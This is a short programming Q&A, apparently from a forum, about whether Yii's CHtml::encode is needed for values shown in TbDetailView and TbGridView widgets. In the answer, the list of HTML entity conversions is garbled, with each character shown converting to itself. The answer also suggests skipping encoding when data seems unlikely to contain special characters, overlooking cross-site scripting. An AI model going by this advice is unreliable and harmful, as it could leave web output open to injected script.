I'm using Yii as PHP Framework and when I need to display some information from database, I'm always using CHtml::encode to improve security.
My question is: Do I need to do the same when I display values at Yii widgets, such as TbDetailView or TbGridView?
For example, is the CHtml::encode necessary at the code below?
<?php $this->widget('bootstrap.widgets.TbDetailView',array(
'data'=>$model,
'attributes'=>array(
'id',
'nome',
'descricao',
'origem',
array('label'=>'Tipo de Refeição', 'value'=>CHtml::encode($model->tipoRefeicao ? $model->tipoRefeicao->nome : '')),
array('label'=>'Ativo', 'value'=>CHtml::encode($model->ativo ? 'Sim' : 'Não')),
),
)); ?>
The CHtml::encode() function is wrapper for PHP htmlspecialchars function it encodes special characters into HTML entities. certain characters have special significance in HTML, and should be represented by HTML entities if they are to preserve their meanings, conversion performed are
- '&' (ampersand) becomes '&'
- '"' (double quote) becomes '"'
- "'" (single quote) becomes '''
- '<' (less than) becomes '<'
- '>' (greater than) becomes '>'
Meaning if that field in DB is likely to have any of these characters you will have to encode it, otherwise it might break the HTML output, if it will not, then there is no need to encode it